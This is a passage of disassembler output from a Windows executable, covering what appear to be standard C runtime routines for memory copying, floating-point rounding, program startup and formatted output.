mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40F3A3: ; CODE XREF: sub_40F260:loc_40F2BC�j
; DATA XREF: sub_40F260:off_40F340�o
jmp off_40F3AC[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40F3AC dd offset loc_40F3BC ; DATA XREF: sub_40F260+35�r
; sub_40F260+92�r ...
dd offset loc_40F3C4
dd offset loc_40F3D0
dd offset loc_40F3E4
; ---------------------------------------------------------------------------
loc_40F3BC: ; CODE XREF: sub_40F260+35�j
; sub_40F260+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40F3C4: ; CODE XREF: sub_40F260+35�j
; sub_40F260+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_40F3D0: ; CODE XREF: sub_40F260+35�j
; sub_40F260+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40F3E4: ; CODE XREF: sub_40F260+35�j
; sub_40F260+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40F3FC: ; CODE XREF: sub_40F260+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40F430
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_40F424
std
rep movsd
cld
jmp off_40F548[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40F424: ; CODE XREF: sub_40F260+1B5�j
; sub_40F260+210�j ...
neg ecx
jmp off_40F4F8[ecx*4]
; ---------------------------------------------------------------------------
align 10h
loc_40F430: ; CODE XREF: sub_40F260+1AA�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_40F448
and eax, 3
sub ecx, eax
jmp dword ptr loc_40F448+4[eax*4]
; ---------------------------------------------------------------------------
loc_40F448: ; CODE XREF: sub_40F260+1DA�j
; DATA XREF: sub_40F260+1E1�r
jmp off_40F548[ecx*4]
; ---------------------------------------------------------------------------
align 10h
dd offset loc_40F45B+1
dd offset loc_40F480
; ---------------------------------------------------------------------------
test al, 0F4h
inc eax
loc_40F45B: ; DATA XREF: sub_40F260+1F0�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
sub esi, 1
shr ecx, 2
sub edi, 1
cmp ecx, 8
jb short loc_40F424
std
rep movsd
cld
jmp off_40F548[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_40F480: ; DATA XREF: sub_40F260+1F4�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_40F424
std
rep movsd
cld
jmp off_40F548[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_40F424
std
rep movsd
cld
jmp off_40F548[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_40F4FC
dd offset loc_40F504
dd offset loc_40F50C
dd offset loc_40F514
dd offset loc_40F51C
dd offset loc_40F524
dd offset loc_40F52C
off_40F4F8 dd offset loc_40F53F ; DATA XREF: sub_40F260+1C6�r
; ---------------------------------------------------------------------------
loc_40F4FC: ; DATA XREF: sub_40F260+27C�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40F504: ; DATA XREF: sub_40F260+280�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_40F50C: ; DATA XREF: sub_40F260+284�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40F514: ; DATA XREF: sub_40F260+288�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_40F51C: ; DATA XREF: sub_40F260+28C�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40F524: ; DATA XREF: sub_40F260+290�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_40F52C: ; DATA XREF: sub_40F260+294�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_40F53F: ; CODE XREF: sub_40F260+1C6�j
; DATA XREF: sub_40F260:off_40F4F8�o
jmp off_40F548[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40F548 dd offset loc_40F558 ; DATA XREF: sub_40F260+1BB�r
; sub_40F260:loc_40F448�r ...
dd offset loc_40F560
dd offset loc_40F570
dd offset loc_40F584
; ---------------------------------------------------------------------------
loc_40F558: ; CODE XREF: sub_40F260+1BB�j
; sub_40F260:loc_40F448�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_40F560: ; CODE XREF: sub_40F260+1BB�j
; sub_40F260:loc_40F448�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_40F570: ; CODE XREF: sub_40F260+1BB�j
; sub_40F260:loc_40F448�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_40F584: ; CODE XREF: sub_40F260+1BB�j
; sub_40F260:loc_40F448�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_40F260 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F5A0 proc near ; CODE XREF: sub_40C0E1+44�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = qword ptr 4
cmp dword_4C5B40, 0
jz sub_4142AA
sub esp, 8
stmxcsr [esp+8+var_4]
mov eax, [esp+8+var_4]
and eax, 1F80h
cmp eax, 1F80h
jnz short loc_40F5D4
fnstcw word ptr [esp+8+var_8]
mov ax, word ptr [esp+8+var_8]
and ax, 7Fh
cmp ax, 7Fh
loc_40F5D4: ; CODE XREF: sub_40F5A0+23�j
lea esp, [esp+8]
jnz sub_4142AA
jmp short $+2
movq xmm0, [esp+arg_0]
movapd xmm2, oword ptr oword_41BB10
movapd xmm1, xmm0
movapd xmm7, xmm0
psrlq xmm0, 34h
movd eax, xmm0
andpd xmm0, oword ptr oword_41BB40
psubd xmm2, xmm0
psrlq xmm1, xmm2
test eax, 800h
jnz short loc_40F662
cmp eax, 3FFh
jl short loc_40F69A
psllq xmm1, xmm2
cmp eax, 432h
jg short loc_40F633
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40F633: ; CODE XREF: sub_40F5A0+86�j
; sub_40F5A0+E1�j
ucomisd xmm7, xmm7
jnp short loc_40F65D
mov edx, 3EDh
sub esp, 10h
mov [esp+10h+var_4], edx
mov edx, esp
add edx, 14h
mov [esp+10h+var_8], edx
mov [esp+10h+var_C], edx
mov [esp+10h+var_10], edx
call sub_413F8C
add esp, 10h
loc_40F65D: ; CODE XREF: sub_40F5A0+97�j
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40F662: ; CODE XREF: sub_40F5A0+74�j
movq xmm0, [esp+arg_0]
psllq xmm1, xmm2
movapd xmm3, xmm0
cmppd xmm0, xmm1, 1
cmp eax, 0BFFh
jl short loc_40F69D
cmp eax, 0C32h
jg short loc_40F633
andpd xmm0, oword ptr oword_41BB00
subsd xmm1, xmm0
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40F69A: ; CODE XREF: sub_40F5A0+7B�j
fldz
retn
; ---------------------------------------------------------------------------
loc_40F69D: ; CODE XREF: sub_40F5A0+DA�j
cmppd xmm3, oword ptr oword_41BB30, 1
orpd xmm3, oword ptr oword_41BB30
andpd xmm3, oword ptr oword_41BB20
movq [esp+arg_0], xmm3
fld [esp+arg_0]
retn
sub_40F5A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40F6C1 proc near ; CODE XREF: sub_40C18A+13�p
; .text:00417D37�p ...
jmp sub_40E359
sub_40F6C1 endp
; =============== S U B R O U T I N E =======================================
sub_40F6C6 proc near ; CODE XREF: sub_40C1BF+2E�p
; sub_40C1BF+47�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_40E723
pop ecx
pop ecx
retn
sub_40F6C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F6D4 proc near ; CODE XREF: sub_40C269+E�p
; sub_417D91+3A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_41BB50
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call dword_4191C0 ; RaiseException
pop edi
pop esi
leave
retn 8
sub_40F6D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40F710 proc near ; CODE XREF: sub_40C62F+88�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = qword ptr 4
cmp dword_4C5B40, 0
jz sub_4143E1
sub esp, 8
stmxcsr [esp+8+var_4]
mov eax, [esp+8+var_4]
and eax, 1F80h
cmp eax, 1F80h
jnz short loc_40F744
fnstcw word ptr [esp+8+var_8]
mov ax, word ptr [esp+8+var_8]
and ax, 7Fh
cmp ax, 7Fh
loc_40F744: ; CODE XREF: sub_40F710+23�j
lea esp, [esp+8]
jnz sub_4143E1
jmp short $+2
movq xmm0, [esp+arg_0]
movapd xmm2, oword ptr oword_41BB80
movapd xmm1, xmm0
movapd xmm7, xmm0
psrlq xmm0, 34h
movd eax, xmm0
andpd xmm0, oword ptr oword_41BBA0
psubd xmm2, xmm0
psrlq xmm1, xmm2
test eax, 800h
jz short loc_40F7D2
cmp eax, 0BFFh
jl short loc_40F80A
psllq xmm1, xmm2
cmp eax, 0C32h
jg short loc_40F7A3
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40F7A3: ; CODE XREF: sub_40F710+86�j
; sub_40F710+E1�j
ucomisd xmm7, xmm7
jnp short loc_40F7CD
mov edx, 3ECh
sub esp, 10h
mov [esp+10h+var_4], edx
mov edx, esp
add edx, 14h
mov [esp+10h+var_8], edx
mov [esp+10h+var_C], edx
mov [esp+10h+var_10], edx
call sub_413F8C
add esp, 10h
loc_40F7CD: ; CODE XREF: sub_40F710+97�j
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40F7D2: ; CODE XREF: sub_40F710+74�j
movq xmm0, [esp+arg_0]
psllq xmm1, xmm2
movapd xmm3, xmm0
cmppd xmm0, xmm1, 6
cmp eax, 3FFh
jl short loc_40F811
cmp eax, 432h
jg short loc_40F7A3
andpd xmm0, oword ptr oword_41BB70
addsd xmm1, xmm0
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40F80A: ; CODE XREF: sub_40F710+7B�j
fld dbl_41BBB0
retn
; ---------------------------------------------------------------------------
loc_40F811: ; CODE XREF: sub_40F710+DA�j
cmppd xmm3, oword ptr oword_41BB90, 6
andpd xmm3, oword ptr oword_41BB70
movq [esp+arg_0], xmm3
fld [esp+arg_0]
retn
sub_40F710 endp
; =============== S U B R O U T I N E =======================================
sub_40F82D proc near ; CODE XREF: .text:0040F958�p
; .text:0040F97E�p ...
arg_0 = dword ptr 4
cmp dword_4C596C, 1
jnz short loc_40F83B
call sub_414629
loc_40F83B: ; CODE XREF: sub_40F82D+7�j
push [esp+arg_0]
call sub_4144B2
push 0FFh
call off_421250
pop ecx
pop ecx
retn
sub_40F82D endp
; ---------------------------------------------------------------------------
loc_40F852: ; DATA XREF: .text:00418068�o
push 60h
push offset stru_41BBB8
call __SEH_prolog
mov edi, 94h
mov eax, edi
call sub_40D9A0
mov [ebp-18h], esp
mov esi, esp
mov [esi], edi
push esi
call dword_419138 ; GetVersionExA
mov ecx, [esi+10h]
mov dword_4C5910, ecx
mov eax, [esi+4]
mov dword_4C591C, eax
mov edx, [esi+8]
mov dword_4C5920, edx
mov esi, [esi+0Ch]
and esi, 7FFFh
mov dword_4C5914, esi
cmp ecx, 2
jz short loc_40F8B2
or esi, 8000h
mov dword_4C5914, esi
loc_40F8B2: ; CODE XREF: .text:0040F8A4�j
shl eax, 8
add eax, edx
mov dword_4C5918, eax
xor esi, esi
push esi
mov edi, dword_419094
call edi ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_40F8ED
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_40F8ED
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_40F905
cmp eax, 20Bh
jz short loc_40F8F2
loc_40F8ED: ; CODE XREF: .text:0040F8CC�j
; .text:0040F8D9�j ...
mov [ebp-1Ch], esi
jmp short loc_40F919
; ---------------------------------------------------------------------------
loc_40F8F2: ; CODE XREF: .text:0040F8EB�j
cmp dword ptr [ecx+84h], 0Eh
jbe short loc_40F8ED
xor eax, eax
cmp [ecx+0F8h], esi
jmp short loc_40F913
; ---------------------------------------------------------------------------
loc_40F905: ; CODE XREF: .text:0040F8E4�j
cmp dword ptr [ecx+74h], 0Eh
jbe short loc_40F8ED
xor eax, eax
cmp [ecx+0E8h], esi
loc_40F913: ; CODE XREF: .text:0040F903�j
setnz al
mov [ebp-1Ch], eax
loc_40F919: ; CODE XREF: .text:0040F8F0�j
push esi
call sub_41202B
pop ecx
test eax, eax
jnz short loc_40F945
cmp dword_4C596C, 1
jnz short loc_40F932
call sub_414629
loc_40F932: ; CODE XREF: .text:0040F92B�j
push 1Ch
call sub_4144B2
push 0FFh
call sub_40DD0D
pop ecx
pop ecx
loc_40F945: ; CODE XREF: .text:0040F922�j
call sub_4115B2
mov [ebp-4], esi
call sub_410364
test eax, eax
jge short loc_40F95E
push 1Bh
call sub_40F82D
pop ecx
loc_40F95E: ; CODE XREF: .text:0040F954�j
call dword_4191C8 ; GetCommandLineA
mov dword_4C5EC0, eax
call sub_414B11
mov dword_4C5964, eax
call sub_414A6F
test eax, eax
jge short loc_40F984
push 8
call sub_40F82D
pop ecx
loc_40F984: ; CODE XREF: .text:0040F97A�j
call sub_41483C
test eax, eax
jge short loc_40F995
push 9
call sub_40F82D
pop ecx
loc_40F995: ; CODE XREF: .text:0040F98B�j
call loc_40DD3D
mov [ebp-20h], eax
cmp eax, esi
jz short loc_40F9A8
push eax
call sub_40F82D
pop ecx
loc_40F9A8: ; CODE XREF: .text:0040F99F�j
mov [ebp-38h], esi
lea eax, [ebp-64h]
push eax
call dword_4191C4 ; GetStartupInfoA
call sub_4147D3
mov [ebp-68h], eax
test byte ptr [ebp-38h], 1
jz short loc_40F9C9
movzx eax, word ptr [ebp-34h]
jmp short loc_40F9CC
; ---------------------------------------------------------------------------
loc_40F9C9: ; CODE XREF: .text:0040F9C1�j
push 0Ah
pop eax
loc_40F9CC: ; CODE XREF: .text:0040F9C7�j
push eax
push dword ptr [ebp-68h]
push esi
push esi
call edi ; GetModuleHandleA
push eax
call sub_404BAB
mov edi, eax
mov [ebp-6Ch], edi
cmp [ebp-1Ch], esi
jnz short loc_40F9EA
push edi
call sub_40DE64
loc_40F9EA: ; CODE XREF: .text:0040F9E2�j
call sub_40DE86
jmp short loc_40FA1C
; ---------------------------------------------------------------------------
loc_40F9F1: ; DATA XREF: .text:stru_41BBB8�o
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-70h], ecx
push eax
push ecx
call sub_414662
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_40FA05: ; DATA XREF: .text:stru_41BBB8�o
mov esp, [ebp-18h]
mov edi, [ebp-70h]
cmp dword ptr [ebp-1Ch], 0
jnz short loc_40FA17
push edi
call sub_40DE75
loc_40FA17: ; CODE XREF: .text:0040FA0F�j
call sub_40DE95
loc_40FA1C: ; CODE XREF: .text:0040F9EF�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, edi
lea esp, [ebp-7Ch]
call __SEH_epilog
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FA2B proc near ; CODE XREF: sub_40D6BB+4B�p
; sub_40DFEC+4A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [esi+0Ch]
test al, 82h
mov ebx, [esi+10h]
jz loc_40FB34
test al, 40h
jnz loc_40FB34
test al, 1
jz short loc_40FA64
and dword ptr [esi+4], 0
test al, 10h
jz loc_40FB34
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_40FA64: ; CODE XREF: sub_40FA2B+20�j
mov eax, [esi+0Ch]
and dword ptr [esi+4], 0
and [ebp+arg_4], 0
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_40FAA0
cmp esi, offset dword_420FA0
jz short loc_40FA8E
cmp esi, offset dword_420FC0
jnz short loc_40FA99
loc_40FA8E: ; CODE XREF: sub_40FA2B+59�j
push ebx
call sub_414C80
test eax, eax
pop ecx
jnz short loc_40FAA0
loc_40FA99: ; CODE XREF: sub_40FA2B+61�j
push esi
call sub_4106EF
pop ecx
loc_40FAA0: ; CODE XREF: sub_40FA2B+51�j
; sub_40FA2B+6C�j
test word ptr [esi+0Ch], 108h
push edi
jz short loc_40FB0A
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
test edi, edi
mov [esi+4], ecx
jle short loc_40FACD
push edi
push eax
push ebx
call sub_41330B
mov [ebp+arg_4], eax
jmp short loc_40FAFD
; ---------------------------------------------------------------------------
loc_40FACD: ; CODE XREF: sub_40FA2B+93�j
cmp ebx, 0FFFFFFFFh
jz short loc_40FAE8
mov eax, ebx
sar eax, 5
mov eax, dword_4C5DC0[eax*4]
mov ecx, ebx
and ecx, 1Fh
lea eax, [eax+ecx*8]
jmp short loc_40FAED
; ---------------------------------------------------------------------------
loc_40FAE8: ; CODE XREF: sub_40FA2B+A5�j
mov eax, offset dword_421260
loc_40FAED: ; CODE XREF: sub_40FA2B+BB�j
test byte ptr [eax+4], 20h
jz short loc_40FB00
push 2
push 0
push ebx
call sub_4134BF
loc_40FAFD: ; CODE XREF: sub_40FA2B+A0�j
add esp, 0Ch
loc_40FB00: ; CODE XREF: sub_40FA2B+C6�j
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_40FB1E
; ---------------------------------------------------------------------------
loc_40FB0A: ; CODE XREF: sub_40FA2B+7C�j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push ebx
call sub_41330B
add esp, 0Ch
mov [ebp+arg_4], eax
loc_40FB1E: ; CODE XREF: sub_40FA2B+DD�j
cmp [ebp+arg_4], edi
pop edi
jz short loc_40FB2A
or dword ptr [esi+0Ch], 20h
jmp short loc_40FB3A
; ---------------------------------------------------------------------------
loc_40FB2A: ; CODE XREF: sub_40FA2B+F7�j
mov eax, [ebp+arg_0]
and eax, 0FFh
jmp short loc_40FB3D
; ---------------------------------------------------------------------------
loc_40FB34: ; CODE XREF: sub_40FA2B+10�j
; sub_40FA2B+18�j ...
or eax, 20h
mov [esi+0Ch], eax
loc_40FB3A: ; CODE XREF: sub_40FA2B+FD�j
or eax, 0FFFFFFFFh
loc_40FB3D: ; CODE XREF: sub_40FA2B+107�j
pop esi
pop ebx
pop ebp
retn
sub_40FA2B endp
; =============== S U B R O U T I N E =======================================
sub_40FB41 proc near ; CODE XREF: sub_40FB74+11�p
; sub_40FB98+22�p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_40FB4D
cmp dword ptr [ecx+8], 0
jz short loc_40FB71
loc_40FB4D: ; CODE XREF: sub_40FB41+4�j
dec dword ptr [ecx+4]
js short loc_40FB5D
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_40FB69
; ---------------------------------------------------------------------------
loc_40FB5D: ; CODE XREF: sub_40FB41+F�j
movsx eax, al
push ecx
push eax
call sub_40FA2B
pop ecx
pop ecx
loc_40FB69: ; CODE XREF: sub_40FB41+1A�j
cmp eax, 0FFFFFFFFh
jnz short loc_40FB71
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_40FB71: ; CODE XREF: sub_40FB41+A�j
; sub_40FB41+2B�j
inc dword ptr [esi]
retn
sub_40FB41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FB74 proc near ; CODE XREF: sub_40FBCF+6A2�p
; sub_40FBCF+6CD�p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_40FB8F
; ---------------------------------------------------------------------------
loc_40FB7C: ; CODE XREF: sub_40FB74+1F�j
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_40FB41
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_40FB95
loc_40FB8F: ; CODE XREF: sub_40FB74+6�j
cmp [ebp+arg_4], 0
jg short loc_40FB7C
loc_40FB95: ; CODE XREF: sub_40FB74+19�j
pop esi
pop ebp
retn
sub_40FB74 endp
; =============== S U B R O U T I N E =======================================
sub_40FB98 proc near ; CODE XREF: sub_40FBCF+6B6�p
; sub_40FBCF+70E�p ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_40FBC5
cmp dword ptr [edi+8], 0
jnz short loc_40FBC5
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_40FBCC
; ---------------------------------------------------------------------------
loc_40FBB2: ; CODE XREF: sub_40FB98+32�j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_40FB41
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_40FBCC
loc_40FBC5: ; CODE XREF: sub_40FB98+A�j
; sub_40FB98+10�j
cmp [esp+8+arg_0], 0
jg short loc_40FBB2
loc_40FBCC: ; CODE XREF: sub_40FB98+18�j
; sub_40FB98+2B�j
pop esi
pop ebx
retn
sub_40FB98 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FBCF proc near ; CODE XREF: sub_40D6BB+2A�p
; sub_40DFEC+29�p ...
var_254 = byte ptr -254h
var_55 = byte ptr -55h
var_54 = byte ptr -54h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
mov eax, dword_421360
xor eax, [ebp+4]
push ebx
mov [ebp+var_4], eax
xor eax, eax
mov [ebp+var_14], eax
mov [ebp+var_18], eax
mov [ebp+var_2C], eax
mov eax, [ebp+arg_4]
mov bl, [eax]
xor ecx, ecx
test bl, bl
jz loc_410333
push esi
push edi
mov edi, eax
jmp short loc_40FC07
; ---------------------------------------------------------------------------
loc_40FC04: ; CODE XREF: sub_40FBCF+75C�j
mov ecx, [ebp+var_38]
loc_40FC07: ; CODE XREF: sub_40FBCF+33�j
inc edi
cmp [ebp+var_18], 0
mov [ebp+arg_4], edi
jl loc_410331
cmp bl, 20h
jl short loc_40FC2E
cmp bl, 78h
jg short loc_40FC2E
movsx eax, bl
movsx eax, byte ptr [eax+41BBA8h]
and eax, 0Fh
jmp short loc_40FC30
; ---------------------------------------------------------------------------
loc_40FC2E: ; CODE XREF: sub_40FBCF+49�j
; sub_40FBCF+4E�j
xor eax, eax
loc_40FC30: ; CODE XREF: sub_40FBCF+5D�j
movsx eax, byte_41BBC8[ecx+eax*8]
push 7
sar eax, 4
pop ecx
cmp eax, ecx ; switch 8 cases
mov [ebp+var_38], eax
ja loc_410324 ; default
jmp off_410344[eax*4] ; switch jump
loc_40FC50: ; DATA XREF: .text:off_410344�o
xor eax, eax ; jumptable 0040FC49 case 1
or [ebp+var_C], 0FFFFFFFFh
mov [ebp+var_3C], eax
mov [ebp+var_34], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_8], eax
mov [ebp+var_28], eax
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FC6D: ; CODE XREF: sub_40FBCF+7A�j
; DATA XREF: .text:off_410344�o
movsx eax, bl ; jumptable 0040FC49 case 2
sub eax, 20h
jz short loc_40FCB0
sub eax, 3
jz short loc_40FCA7
sub eax, 8
jz short loc_40FC9E
dec eax
dec eax
jz short loc_40FC95
sub eax, 3
jnz loc_410324 ; default
or [ebp+var_8], 8
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FC95: ; CODE XREF: sub_40FBCF+B2�j
or [ebp+var_8], 4
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FC9E: ; CODE XREF: sub_40FBCF+AE�j
or [ebp+var_8], 1
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FCA7: ; CODE XREF: sub_40FBCF+A9�j
or byte ptr [ebp+var_8], 80h
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FCB0: ; CODE XREF: sub_40FBCF+A4�j
or [ebp+var_8], 2
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FCB9: ; CODE XREF: sub_40FBCF+7A�j
; DATA XREF: .text:off_410344�o
cmp bl, 2Ah ; jumptable 0040FC49 case 3
jnz short loc_40FCDF
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_24], eax
jge loc_410324 ; default
or [ebp+var_8], 4
neg [ebp+var_24]
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FCDF: ; CODE XREF: sub_40FBCF+ED�j
mov eax, [ebp+var_24]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_24], eax
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FCF4: ; CODE XREF: sub_40FBCF+7A�j
; DATA XREF: .text:off_410344�o
and [ebp+var_C], 0 ; jumptable 0040FC49 case 4
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FCFD: ; CODE XREF: sub_40FBCF+7A�j
; DATA XREF: .text:off_410344�o
cmp bl, 2Ah ; jumptable 0040FC49 case 5
jnz short loc_40FD20
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
mov [ebp+var_C], eax
jge loc_410324 ; default
or [ebp+var_C], 0FFFFFFFFh
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FD20: ; CODE XREF: sub_40FBCF+131�j
mov eax, [ebp+var_C]
movsx ecx, bl
lea eax, [eax+eax*4]
lea eax, [ecx+eax*2-30h]
mov [ebp+var_C], eax
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FD35: ; CODE XREF: sub_40FBCF+7A�j
; DATA XREF: .text:off_410344�o
cmp bl, 49h ; jumptable 0040FC49 case 6
jz short loc_40FD68
cmp bl, 68h
jz short loc_40FD5F
cmp bl, 6Ch
jz short loc_40FD56
cmp bl, 77h
jnz loc_410324 ; default
or byte ptr [ebp+var_8+1], 8
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FD56: ; CODE XREF: sub_40FBCF+173�j
or [ebp+var_8], 10h
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FD5F: ; CODE XREF: sub_40FBCF+16E�j
or [ebp+var_8], 20h
jmp loc_410324 ; default
; ---------------------------------------------------------------------------
loc_40FD68: ; CODE XREF: sub_40FBCF+169�j
mov al, [edi]
cmp al, 36h
jnz short loc_40FD82
cmp byte ptr [edi+1], 34h
jnz short loc_40FD82
inc edi
inc edi
or byte ptr [ebp+var_8+1], 80h
